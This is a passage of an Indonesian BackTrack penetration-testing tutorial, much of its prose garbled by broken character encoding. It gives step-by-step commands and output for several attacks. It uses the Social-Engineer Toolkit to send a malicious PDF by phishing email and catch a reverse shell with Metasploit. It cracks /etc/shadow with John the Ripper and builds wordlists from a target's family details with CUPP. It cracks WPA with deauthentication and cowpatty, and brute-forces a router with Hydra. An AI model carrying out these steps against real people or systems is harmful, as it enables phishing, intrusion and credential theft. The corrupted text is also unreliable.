nmap1prints &a# xprobe1conf. G.#aka# 2eri#tah %,cate .#t.k -e#cari +i%e+i%e
terse/.t. (#t.k -e-.%ai h,#e"& kita har.s -e-/.at +i%e c,#+i$.rasi#"a ter%e/ih
&ah.%.. Se/a$ai c,#t,h jika kita -a. -e-/.at !irt.a% h,st <i#&,<s &e#$a#
/e/era2a ,2e# 2,rts "a#$ ter/.ka.
root&bt%)F gedit 8oneyd.con"
ke-.&ia# 2asteka# scri2t &i /a<ah i#i
create de"ault
set de"ault de"ault tcp action block
set de"ault de"ault udp action block
set de"ault de"ault icmp action block
create 'indo's
set 'indo's personality R,icroso"t Sindo's T/
/ro"essional 3/1R
set 'indo's de"ault tcp action reset
add 'indo's tcp port 135 open
add 'indo's tcp port 139 open
add 'indo's tcp port $$5 open
set 'indo's et8ernet R00%00%2$%ab%#c%12R
d8cp 'indo's on et80
%a%. si%ahka# &i sa!e. La#$kah se%a#j.t#"a a#&a har.s r.##i#$ h,#e"&.c,#+ &e#$a#
2eri#tah
root@bt:~# honeyd -d -f honeyd.conf
hasi% #-a2 terha&a2 i2 ,t,-atis "a#$ &i /.at ,%eh h,#e"& X dhcp 0indo0s on ethF Y
Starting Nmap 5.00 ( http://nmap.org ) at 2011-05-06 13:13 EDT
Interesting ports on someone (172.20.73.77):
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1337/tcp closed waste
MAC Address: 00:00:24:26:C4:ED (Connect AS)
Jika kita -e%ak.ka# 2i#$i#$ terha&a2 i2 h,#e"&
honeyd[1870]: arp reply 192.168.99.135 is-at 00:00:24:c8:e3:34
honeyd[1870]: Sending ICMP Echo Reply: 192.168.99.135 ->
192.168.99.128
honeyd[1870]: arp_send: who-has 192.168.99.128 tell
192.168.99.135
honeyd[1870]: arp_recv_cb: 192.168.99.128 at 00:0c:29:7e:60:d0
192.168.99.128
192.168.99.128
192.168.99.128
tugas buat file konfigurasi lainnya
create default
set default default tcp action block
set default default udp action block
set default default icmp action block
create windows
set windows personality "Microsoft Windows XP Professional SP1"
set windows default tcp action reset
add windows tcp port 135 open
create avaya
set avaya personality "Avaya G3 PBX version 8.3"
set avaya default tcp action reset
add avaya tcp port 4445 open
add avaya tcp port 5038 open
create solaris
set solaris personality "Avaya G3 PBX version 8.3"
set solaris default tcp action reset
add solaris tcp port 22 open
add solaris tcp port 2049 open
set windows ethernet "00:00:24:ab:8c:12"
set avaya ethernet "00:00:24:ab:8c:13"
set solaris ethernet "00:00:24:ab:8c:14"
dhcp windows on eth1
dhcp avaya on eth1
dhcp solaris on eth1
$.%.*. S.E.T
Set -er.2aka# t,,%s s,cia% e#$i#eeri#$ -.%ti +.#$si. SET -er.2aka# si#$kata# &ari
*ocial6%ngineering6(oolkit "a#$ &i /a#$.# &ari /ahasa python 1 Direkt,ri &i -a#a
set /era&a secara &e+a.%t /era&a 2a&a
!pentest!exploits!set
root@bt:/pentest/exploits/set# ls
config modules reports set-automate set-update set-web
__init__.py readme set set-proxy setup.py src
root@bt:/pentest/exploits/set#
en4 6ada SET
root@bt:/pentest/exploit/set# ./set
stop shop for all of your social-engineering needs..

DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
10) Update the Metasploit Framework
11) Update the Social-Engineer Toolkit
12) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
S6ear+P2is2in1 Attack (ectors
Ber$.#a .#t.k -e#$iri- -ass e-ai% &a# &i k,-/i#asika#
&e#$a# +i%e "a#$ te%ah &isisi2i /ack&,,r .
(#t.k -e#$$.#aka# 2%.$i# i#i kita har.s -e#$e&it +i%e config!set<config
SENDAI'QOFF r./ah -e#ja&i SENDAI'QON.
$@ Per3or5 a ass E5ai/ Attack
4a&a /a$ia# i#i kita aka# &iha&a2ka# &e#$a# 2i%iha# /ack&,,r "a#$ aka#
ter/e#t.k &a%a- /e#t.k +i%e exe
Je#is /ack&,,r "a#$ &i terse&ia
********** PAYLOADS **********
1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer
Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-
087)
5) Adobe Flash Player "Button" Remote Code Execution
6) Adobe CoolType SING Table "uniqueName" Overflow
7) Adobe Flash Player "newfunction" Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
(#t.k c,#t,h sa"a c,/a 2i%iah #,-er 7 "ait. Adobe Flash -layer Gne0functionG Invalid
-ointer )se
Ke-.&ia# &i%a#j.tka# &e#$a# 2e-i%iha# 2a"%,a&
1) Windows Reverse TCP Shell Spawn a command shell
on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter
shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server
on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command
Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the
attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and
create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel
communication over HTTP using SSL and use Meterpreter
&a%a- c,#t,h ka%i i#i sa"a -e-i%ih <i#&,<s re!erse TC4 she%% aa 1
sete%ah %a#$kah ta&i kita har.s -e#e#t.ka# 2,rt "a#$ &i $.#aka#
set:payloads > Port to connect back on [443]: 4444
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the
src/program_junk/src/program_junk/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to
create your attachment.
Right now the attachment will be imported with filename of
'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.
set:phishing > [*] Keeping the filename and moving on.
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second
option
will allow you to import a list and send it to as many
people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
Di%ihat &ari hasi% &i atas sehar.s#"a kita &a2at -e-/eri #a-a +i%e 2&+ terse/.t
#a-.# 2a&a c,#t,h i#i sa"a ha#"a skip 2r,ses i#i.
Ke-.&ia# a#&a har.s -e-i%ih ' 2i%iha# "ait. sera#$a# -e#.j. ke satu @ t.#$$a% B
e-ai% &a# sera#$a# -e#.j. ke banyak e-ai% @ -ass -ai%er B
set:phishing > 1
Do you want to use a predefined template or craft
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
2i%ih te-2%ate "a#$ &i sia2ka# ,%eh SET sa"a c,/a 2ick 1
set:phishing > 1
[-] Available templates:
1: Have you seen this?
2: Status Report
3: Dan Brown's Angels & Demons
4: Strange internet usage from your computer
5: Computer Issue
6: Baby Pics
7: WOAAAA!!!!!!!!!! This is crazy...
8: How long has it been?
9: New Update
sa"a tertarik &e#$a# I#e< .2&ateJ sa#$at seri#$ e-ai% &i kiri- &e#$a# katakata
#e<.2&ate kare#a it. a", kita -.%ai
set%p8is8ing U 9
set%p8is8ing U 3end email to%
isika# e-ai% tar$et a#&a c,#t,h sa"a kiri- ke Hee.eiche%S$-ai%.c,-
set:phishing > Send email to: zee.eichel@gmail.com
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
Nah kita /isa -e#$$.#aka# $-ai% acc,.#t kita sa"a 2i%ih #,-er sat. jika a#&a
-e-i%iki server email se#&iri a#&a /isa -e-i%ih #,-er '
isika# &ata e-ai% a#&a
set:phishing > 1
set:phishing > Your gmail email address: :
zee.eichel@indonesianbacktrack.or.id
Email password:
set:phishing > Flag this message/s as high priority? [yes|no]:
yes
ke-.&ia# SET secara ,t,-atis aka# -e-/.at %iste#er %e<at -etas2%,it -,&.%e
.#t.k -e-/e#t.k %iste#er
set:phishing > Setup a listener [yes|no]: yes

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13733 updated 94 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated
94 days ago.
We recommend that you update the framework at least
every other day.
For information on updating your copy of Metasploit,
please see:
https://community.rapid7.com/docs/DOC-1306
resource (src/program_junk/meta_config)> use
exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD
windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.3
LHOST => 192.168.1.3
resource (src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (src/program_junk/meta_config)> set ENCODING
shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.3:4444
[*] Starting the payload handler...
%. OFF'INE PASS!ORD ATTACK
4e#$ertia# &ari sera#$a# ,++%i#e 2ass<,r& attack se/e#ar#"a a&a%ah -et,&e
sera#$a# terha&a2 se/.ah karakter sa#&i "a#$ te%ah tere#skri2si 2a&a /er/a$ai
-et,&e e#skri2si serta /er.saha .#t.k -e-ecahka##"a -e#ja&i /er/a$ai +,r-at
secara ,++%i#e ata. ti&ak -e-/.t.hka# k,#eksi i#ter#et se/a$ai -e&ia.
Be/era2a t,,%s /acktrack "a#$ terse&ia &a%a- sera#$a# ,++%i#e i#i a#tara %ai#
$. c.22.2"
%. J,h# The Ri22er @ JTR B
9. C,<2att"
Se/e#ar#"a -asih /a#"ak %a$i ha% "a#$ &a2at kita %ak.ka# kare#a /er/a$ai -et,&e
cracki#$ &a# cara -a#.a% %ai##"a /e$it. /a#"ak &a# k,-2%eks. Ber/a$ai t,,%s
terse/.t &a2at a#&a te-.i 2a&a &irekt,ri !pentest!pass0ord!
%.$. C466.67
%.$.$. e5b4at word/ist den1an c466.67
C.22.2" se/e#ar#"a %e/ih ke2a&a 2e#&ekata# Is,cia% e#$$i#eri#$ attack @ s,ce#$ BJ
keti-/a#$ I,++%i#e 2ass<,r& attackJ /eta2a ti&ak t,,%s i#i se/e#ar#"a &i $.#aka#
sete%ah 2e#$.-2.%a# i#+,r-asi -e%a%.i teh#ik s,ce#$ "a#$ te%ah kita /ahas 2a&a
-,&.%e trai#i#$ se/e%.-#"a.
C.22.2" -er.2aka# si#$kata# &ari Icommon user pass3ord pro/illerJ &a# &i
ci2taka# ,%eh muris kurgas. C.22.2" se/e#ar#"a a&a%ah se/.ah t,,%s "a#$ secara
,t,-atis aka# -e-/.at 2ass<,r& %ist /er&asarka# hasi% &ari 2e#$.-2.%a# i#+,r-asi
/aik %e<at i#+,r-ati,# $atheri#$ ata. s,ce#$. Biasa#"a %e<at s,ce#$ kare#a i#i
%e/ih ke2a&a Ihumanity social informationJ
'.1.'. 'okasi c466.67
(#t.k -e#$akses c.22.2" kita har.s -e#$akses#"a ke &irekt,ri
!pentest!pass0ord!cupp.
Ata. /isa kita %a#$s.#$ -e#$akses#"a &ari -e#. #a$a
%.$.9. Pen114naan C466.67
h (#t.k -e%ihat ,2si,2si 2ara-eter %ai##"a
i Di$.#aka# .#t.k -e#&,<#%,a& &ata/ase &ari ,1+,r& .#i!ersit" re2,sit,r"
root@bt:/pentest/passwords/cupp# ./cupp.py -l
i &i$.#aka# .#t.k -e-/.at 2ass<,r& %ist /er&asarka# &ata terte#t.

4erta#"aa# E 2erta#"aa# &asar aka# &i %,#tarka# 2a&a /a$ia# i#i> 2erta#"aa# E
2erta#"aa# terse/.t #a#ti#"a aka# &i $.#aka# se/a$ai ac.a# .#t.k -e-/.at &a+tar
2ass<,r&. 4erta#"aa#2erta#"aa# /erkisar s,cia% terse/.t -e#cak.2 /e/era2a
i#+,r-asi 2ri/a&i sa"a /a$i &a%a- /e/era2a kate$,ri i#+,r-asi
Informasi target secara pribadi
T na5e Q isika# &e#$a# #a-a tar$et "a#$ he#&ak a#&a /.at 2ass<,r& %ist#"a.
T s4rna5e Q Na-a ke%.ar$a /esar /iasa#"a /isa #a-a te#$ah ata. -ar$a
T nickna5e Q /e/era2a ,ra#$ /iasa#"a -e-i%iki j.%.ka# ata. a%ias> isika# a%ias
tar$et jika a&a
T birt2da7 Q ta#$$a% %ahir tar$et &e#$a# +,r-at hari _ /.%a# _ tah.#
Informasi Istri atau suami 2 pasangan hidup 3 bisa pacar atau mantan
T wi3eUs ? 24sbandUs @ nickna5e Q Na-a istri ata. s.a-i tar$et
T wi3eUs ? 24sbandUs @ nickna5e Q a%ias ata. j.%.ka# &ari istri ata. s.a-i tar$et
T wi3eUs ? 24sbandUs @ birt2da7 Q ta#$$a% %ahir &ari s.a-i ata. istri tar$et
Informasi anak dari target
T c2i/dUs na5e Q Na-a a#ak
T c2i/dUs nickna5e Q a%ias ata. j.%.ka# &ari a#ak
T c2i/dUs birt2da7 Q ta#$$a% %ahir &ari a#ak tar$et
Informasi lainnya
T 6etUs na5e Q #a-a /i#ata#$ 2e%iharaa#
T Co56an7 na5e Q #a-a 2er.sahaa# &i -a#a &ia /ekerja ata. 2e-i%ik
(ambahan pelengkap
T ke7word Q /e/era2a kata k.#ci @ ke"<,r& B ata. i#+,r-asi ta-/aha#
T s6ecia/c2ar Q /e/era2a s2esia% karakter se2erti @ P>\>S B aka# &i ta-/ahka# 2a&a
ke"<,r&
T rando5 n45bers Q /e/era2a #,-,r secara acak aka# &i ta-/ahka# 2a&a setia2
akhir kata.
'okasi 6en7i56anan 2asi/ 6e5b4atan /ist 6assword
Secara &e+a.%t cupp1py aka# -e-/.at hasi% &ari 2ara-eter i > ke &a%a- /e#t.k t1t
ke-.&ia# &i#a-aka# &e#$a# #a-a tar$et. 4a&a c,#t,h &i atas sa"a -e-as.ka#
#a-a ItargetJ 2a&a 2i%iha# #a-a -aka #a-a +i%e <,r&%ist terse/.t aka# -e#ja&i
target1txt
+ w Di$.#aka# .#t.k -e-/.at 2ass<,r& %ist "a#$ te%ah kita /.at -aki# k,-2%eks.
Ha#"a saja -e-a#$ 2eri#tah i#i aka# -e#$hasi%ka# 2ass<,r& %ist "a#$ /esar >
sehi#$$a c.22.2" se#&iri 2.# -e#"ara#ka# a$ar ti&ak -e#$$.#aka# 2eri#tah i#i.
a &i $.#aka# .#t.k -e#&,<#%,a& &ata/ase &ari a%ect,&/
%.%. 0o2n T2e Ri66er ? 0TR @
%.%.$. Pen1ertian 0o2n T2e Ri66er
J,h# the Ri22er a&a%ah 2ass<,r& cracker "a#$ ce2at > saat i#i terse&ia .#t.k
Ber/a$ai siste- ,2erasi se2erti (#i1> =i#&,<s> D)S> Be)S> &a# )2e#VMS.
T.j.a# .ta-a#"a a&a%ah .#t.k -e#&eteksi &a# -e#$.ji 2ass<,r& (#i1 "a#$ %e-ah.
Se%ai# /e/era2a cr"2t @0B sa#&i je#is hash "a#$ 2a%i#$ .-.- &ite-.ka# 2a&a
/er/a$ai siste- (#i1> =i#&,<s LM hash> &ita-/ah /a#"ak hash %ai# &a# ci2her
"a#$ &i se-2.r#aka# 2a&a !ersi k,-.#itas
XaY !ord/ist Q Me#$$.#aka# &a+tar katakata "a#$ aka# &i ja&ika# ac.a# /a$i JTR
.#t.k -e%ak.ka# sera#$a# .
X/Y Sin1/e crack Q Da%a- -,&e i#i > JTR aka# -e#c,/a .#t.k -e%ak.ka# sera#$a#
&e#$a# -e#$$.#aka# &a# -e-a#+aatka# %,$i#AGEC)S i#+,r-ati,# se/a$ai kata
sa#&i
XcY Incre5enta/ Q *#i a&a%ah s.at. 2r,ses "a#$ k.at. J,h# aka# -e#c,/a setia2
k,-/i#asi karakter .#t.k res,%!e 2ass<,r&.
%.%.%. en1o6erasikan ;o2n T2e Ri66er
(#t.k -e%ak.ka# test &a# benchmark terha&a2 ke-a-2.a# j,h# the ri22er >
-as.ka# 2eri#tah se2erti &i /a<ah i#i
Sin1/e 3i/e crackin1
Secara .-.- 2eri#tah j,h# sa#$at -.&ah. 4erhatika# s"#ta1 &i /a<ah i#i
john [ file ]
se/a$ai c,#t,h c,/a kita /.at se/.ah +i%e k,s,#$ ke-.&ia# isika# &e#$a#
myuser%+Kl.ES';2815L
Ke-.&ia# sa!e &e#$a# #a-a 2ass<,r&.t1t ata. terserah &e#$a# kei#$i#a# a#&a.
La%. %ak.ka# 2e#$etesa# crack &e#$a# j,h#

UNSHADO!
4a&a siste- /er/asis %i#.1 ata. .#i1 i#+,r-asi terha&a2 .ser &a# %,$i# secara &e+a.%t
tercatat 2a&a +i%e I!etc!shado0J &a# I!etc!pass0dJ Ha% i#i sa#$at re#ta# &a%a- s.at.
siste- kea-a#a#. Me#$i#$at .ser /er2a#$kat terti#$$i Ir,,tJ j.$a &i catat
i#+,r-asi#"a &i ke&.a +i%e terse/.t. JTR -e-i%iki ke-a-2.a# .#t.k -e%ak.ka#
2e#etrati,# testi#$ terha&a2 kere#ta#a# +i%e+i%e terse/.t. T.j.a##"a a$ar a#&a &a2at
-e#$etah.i se/era2a /aik k,#&isi 2ass<,r& a#&a &a%a- /r.te+,rci#$ attacki#$.
La#$kah E %a#$kah &a%a- -e%ak.ka# 2e#trati,# -e#$$.#aka# +asi%itas
(NSHAD)= 2a&a JTR a&a%ah se/a$ai /erik.t.
Me#"a%i# +i%e !etc!shado0! &a# +i%e !etc!pass0d! ke&a%a- se/.ah te1t +i%e
Da%a- ha% i#i sa"a -e#a-aka# +i%e terse/.t se/a$ai 6ass.t<t. 4erhatika# $a-/ar &i
/a<ah i#i.
Me%ak.ka# cracki#$ &e#$a# -,&e Isingle crack modeJ
root@bt:/pentest/passwords/john# john pass.txt
Jika j,h# /erhasi% -e%ak.ka# cracki#$ &ari sa%ah sat. 2ass<,r& > -aka secara
,t,-atis aka# tersi-2a# 2a&a +i%e LD.;o2nD;o2n.6ot kita &a2at -e%ihat#"a
&e#$a# cara -e%ak.ka# 2eri#tah
root@bt:/pentest/passwords/john# --show pass.txt
Jika kita ingin melihat hasil crack dari user tertentu , kita dapat memangilnya
berdasarkan UID contoh saya ingin melihat hasil dari root dengan uid=0
root@bt:/pentest/passwords/john# --show users=0 pass.txt
ata. /isa &e#$a#
root@bt:/pentest/passwords/john# --show --users=0
*passwd*
Anda pun dapat men-filter berdasarkan group
root@bt:/pentest/passwords/john# john --wordlist=passwd.lst
--rules pass.txt
John dapat melakukan multi sesi dalam melakukan aksinya. Sebagai contoh saya
membuat sesi allrules
root@bt:/pentest/passwords/john#john --session=allrules
--wordlist=all.lst --rules pass.txt
root@bt:/pentest/passwords/john#john status=allrules
Jika anda menginginkan menghentikan salah satu dari sesi , gunakan perintah ps
untuk melihat informasi proses dan perintah kill untuk mengehentikan proses
berdasarkan PID( process id )

root@bt:/pentest/passwords/john#ps aux | grep john
root@bt:/pentest/passwords/john#kill HUP $PID
root@bt:/pentest/passwords/john#john restore=allrules
2.3. Cowpatty
%.9.$. Pen1ertian cow6att7
C,<2att" a&a%ah =4A ? 4SK &icti,#ar" attack t,,%s> ata. t,,%s /er&asarka#
/r.te+,rci#$ &e#$a# &icti,#ar" %ist "a#$ -e#"era#$ e#skri2si <ire%ess <2a ? 2sk .
C,<2att" s.&ah teri#sta%% secara &e+a.%t &i /acktrack V.
%.9.%. Pen114naan cow6att7
*k.ti %a#$kah%a#$kah &i /a<ah i#i
1. Cek S466ort Inter3ace
%a#$kah 2erta-a te#t. saja kita -e-/.t.hka# i#ter+ace <ire%ess "a#$ s.22,rt
terha&a2 -,&e -,#it,r
cek k,-2eti/i%itas <ire%ess
root@nindya-putri:~# airmon-ng
Di%ihat &ari hasi% &i atas /erarti i#ter+ace <ire%ess /er/asis 2a&a <%a#; te%ah s.22,rt
&e#$a# -,&e -,#it,r ..Bisa &ikataka# a#&a te%ah sia2 -e%ak.ka# sera#$a#
%.ode 5onitor
Se%a#j.t#"a kita -e#$akti+ka# -,&e -,#it,r 2a&a <%a#;
root@nindya-putri:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 [phy0]
(monitor mode enabled on mon0)
)k kita te%ah s.kses seja.h i#i > ,.t2.t 2a&a ter-i#a% -e#.#j.ka# /ah<a -,#it,r
-,&e te%ah &i akti+ka# 2a&a i#ter+ace -,#;
0. Airod456
Berik.t#"a Kita har.s -e#a#$ka2 @&.-2B tra++ik 2a&a akses 2,i#t tar$et &a# %a%.
%i#tas 2aket &ata a#tara A4 &a# c%ie#t "a#$ se&a#$ terk,#eksi > se/e%.-#"a sa"a
-e%ak.ka# i#+,r-ati,# $atheri#$ .#t.k -e#$etah.i /e/era2a s2esi+ikasi tar$et "a#$
&i /.t.hka#
)k "a#$ 2er%. kita catat &ari 2e#$.-2.%a# i#+,r-asi &ata "a#$ &i 2er%.ka# a&a%ah
@ &a%a- kas.s sa"a B
a. /ssi& A4 ^ ;;Q1EQC1Q3CQB8Q89
/. cha##e% ^ 11
c. ENC ^ =4A
&. SS*D ^ i/tea-0$
3. A*R)D(M4NG
Se%a#j.t#"a sa"a -e%ak.ka# &.-2 tra+ik &ata a#tara c%ie#t terk,#ek &a# Akses 2,i#t
@A4B
root@nindya-putri:~# airodump-ng --bssid 00:1E:C1:4C:BF:F8 -w
dump_traf1 -c 11 mon0
root@nindya-putri:~# airodump-ng mon0
sa"a je%aska# se&ikit -e#$e#ai 60 dump<trafA ..2ara-eter i#i /er+.#$si .#t.k
-e-/.at s.at. +i%e hasi% ca2t.re &a# &.-2 tra+ik ta&i> &.-2Ftra+1 a&a%ah #a-a +i%e
"a#$ sa"a 2i%ih a#&a /e/as -e-i%ih #a-a %ai# ses.ka hati a#&a. Da# +i%e terse/.t
#a#ti#"a aka# /erekste#si,# .ca6. Te#t. saja +i%e terse/.t aka# &i /.at 2a&a %,kasi
&irekt,ri &i-a#a a#&a -e-.%ai 2eri#tah air,&.-2.
5. HANDSHAKE
T.j.a# kita &a%a- ca2t.ri#$ i#i se/e#ar#"a a&a%ah -e#cari ha#&shake. (#t.k
-e#&a2atka# #i%ai ha#&shake kita har.s -e#&isk,#eksika# c%ie#t "a#$ s.&ah
terk,#eksi &e#$a# /aik ke A4 tar$et. ,k sa"a tertarik 2a&a c%ie#t "a#$ te%ah
terk,#eksi &e#$a# A4 &e#$a# ssid @ ibteam63g B &e#$a# bssid F#D%+D3CDBBD"FDF3.
Kita $.#aka# +asi%itas aire2%" .#t.k -e%ak.ka# dea4t2 attack.
root@nindya-putri:~# aireplay-ng --deauth 1 -a 00:1E:C1:4C:BF:F8
-c F4:EC:38:99:60:F3 mon0
,k 2erhatika# 2a&a $a-/ar &i /a<ah i#i > /ah<a sete%ah aire2%a"#$ &i esek.si kita
-e#&a2atka# 2ands2ake .. kare#a &a%a- kea&aa# tere#skri2si > ti5e to crack it SS
.. CO!PATT: ACTION
)k kita s.&ah &i 2astika# -e#&a2at +i%e ca2t.re handshake "a#$ tersi-2a#
2a&a &irekt,ri &i -a#a a#&a -e-.%ai ca2t.ri#$ &e#$a# air,&.-2 ta&i.
-asih i#$atka# ta&i sa"a si-2a# &e#$a# #a-a dump<trafA aka# tersi-2a#
,t,-atis &e#$a# #a-a dump<traffA6FA1cap1
(#t.k -e%ak.ka# crack kita -e-/.t.hka# 3i/e 2as2 ?1en65k@
root@nindya-putri:~# genpmk -f pass.txt -d tes_genpmk_hash_wpa
-s ibteam-3g -v
,h i"a j$# %.2a /ah<a a#&a -e-/.t.hka# 2ass<,r& %ist @&icti,#ar"B .. "a#$
#a#ti#"a -e#ja&i #i%ai &ari 2ara-eter +. 4a&a kas.s sa"a ka%i i#i sa"a te%ah
-e#"ia2ka# 2ass<,r& %ist &a%a- +,%&er "a#$ sa-a.saat#"a kita -e#$,%ah
+i%e+i%e /aik hasi% ca2t.re> hashi#$ &a# 2ass<,r& %ist &e#$a# c,<2att"
cowpatty -s ibteam-3g -f pass.txt -d tes_genpmk_hash_wpa -r
dump_traf1-01.cap -v
&i-a#a 2ara-eter#"a Q
-s ( ssid AP target )
-f ( lokasi file password list dictionary )
-d ( hasil hashing password list dictionary
dengan genpmk )
-r ( hasil capturing handshadke dengan airdump
)
-v ( verbose output )
9. ON'INE PASS!ORD ATTACK
Ber/e&a &e#$a# ,++%i#e 2ass<,r& attack > "a#$ &i -aks.& &e#$a# ,#%i#e 2ass<,r&
attack a&a%ah t,,%s "a#$ -e-i%iki ke-a-2.a# .#t.k -e%ak.ka# 2e#"era#$a# secara
/r.te+,rci#$ terha&a2 ser!iceser!ice secara ,#%i#e. Bisa &e#$a# -e&ia i#ter#et ata.
-e&ia jari#$a#. Met,&e "a#$ &i2akai k.ra#$ %e/ih sa-a &e#$a# )++%i#e 4ass<,r&
attack.
9.$. H7dra
9.$.$. Pen1ertian H7dra
H"&ra a&a%ah t,,%s /r.te+,rci#$ "a#$ 2a%i#$ /a#"ak &i $.#aka# ,%eh 2ara 2e#tester>
h"&ra -e-i%iki -et,&e &icti,#ar" "a#$ -e-i%iki ke-a-2.a# -e#"era#$ &a%a-
/er/a$ai ti2e ser!ice
Be/era2a ser!ice ,#%i#e "a#$ s.&ah ter.ji &i %a/ *#&,#esia# Backtrack Tea- &a2at
&i te-/.s H"&ra
a. SMB
/. htt22,st+,r-
c. htt2shea&
&. 8T4 @ +i%e tra#s+er 2r,t,c,% B
e. SSH @ sec.re she%% B
+. *MA4
9.$.%. Pen114naan H7dra
4e#$$.#aa# h"&ra sa#$at si-2%e &a# -.&ah
s"#ta1 &asar Q h"&ra % X.ser%,$i#%istY 2 X 2ass<,r&%istY Xser!iceY
User 'o1in 'ist
(ser %,$i# %ist "a#$ &i -aks.&ka# a&a%ah &a+tar ke-.#$ki#a# &ari 2e#$$.#aa#
#a-a .ser %,$i# &ari -esi# tar$et. C,#t,h#"a sa"a -e#$.-2.%ka# /e/era2a #a-a
ke-.#$ki#a# .ser a&-i# %,$i# ke-.&ia# sa"a si-2a# &a%a- se/.ah +i%e.
Masih /a#"ak ,2si %ai##"a > i#$atkah a#&a aka# t.%isa# sa"a -e#$e#ai c.22.2" ata.
a.t,$e#erat,r 2ass%ist %ai##"a. Ke-.#$ki#a# teh#ik s,cia%e#$i#eeri#$ j.$a sa#$at
&i/.t.hka# &a%a- -e-/.at %ist .ser.
Password /ist
Sete%ah -e-/.at .ser %ist kita har.s -e-/.at 2ass<,r& %ist. Kare#a h"&ra /ekerja
/erac.a# 2a&a ke&.a +i%e. *#$at /ah<a ke/a#"aka# 2er-i#taa# %,$i# &ari /er/a$ai
-aca- ser!ice ha#"a ter2.sat 2a&a &.a ti2e. (ser &a# 4ass<,r&.
Ser=ice
La#$kah terakhir a#&a ti#$$a% aka# -e#e#t.ka# ser!ice "a#$ kirakira aka#
&isera#$ ,%eh h"&ra 2a&a s.at. siste- k,-2.ter. H"&ra -e-i%iki /a#"ak ,2si
ser!ice &a# te#t. saja ,2si,2si terse/.t har.s &i &ek%arisasika#
'ab Action
Conto2 6en114naan $
Conto2 6en114naan br4te3orcin1 27dra ter2ada6 5ode5 ro4ter s6eed7
La#$kah%a#$kah
$. Me#&a2atka# akses DHC4 c%ie#t
%. Me-/.at .ser%ist .ser &a# 2ass<,r&
9. Me%ak.ka# i&e#ti+ikasi je#is sera#$a# ser!ice
). Me%ak.ka# /r.te+,rci#$ &e#$a# h"&ra
enda6atkan akses DHCP c/ient
Sera#$a# terha&a2 -,&e- r,.ter /isa -e%a%.i NAT @ &e#$a# -e#$$.#aka# i2
2./%ik B ata. &e#$a# i2 statik &e#$a# a#$$a2a# a#&a te%ah &i teri-a &a%a-
%i#$k.#$a# #et<,rk sete-2at.
root@bt:~# dhclient
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth0/00:16:36:c7:8d:54
Sending on LPF/eth0/00:16:36:c7:8d:54
Listening on LPF/wlan0/00:19:d2:45:4d:96
Sending on LPF/wlan0/00:19:d2:45:4d:96
Sending on Socket/fallback
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 7
DHCPREQUEST of 192.168.1.6 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.6 from 192.168.1.1
bound to 192.168.1.6 -- renewal in 34338 seconds.
4erhatika# 2a&a c,#t,h &i atas sa"a te%ah -e%ak.ka# k,#ekti!itas &e#$a# r,.ter
sete-2at "a#$ -e-i%iki s.2,rt terha&a2 a.t, DHC4. )k &e#$a# k,#eksi i#ter+ace
<%a# kita aka# -e#c,/a -e#e-/.s -,&e- r,.ter sta#&art
M,&e- r,.ter /iasa#"a &i2asa#$ &e#$a# i2a&&ress sta#&art "ait. 1:'.169.1.1 /isa
&i cek jika -e#$etika# 2eri#tah IrouteJ .
root@eichel:~# route
Destination Gateway Genmask Flags Metric Ref
Use Iface
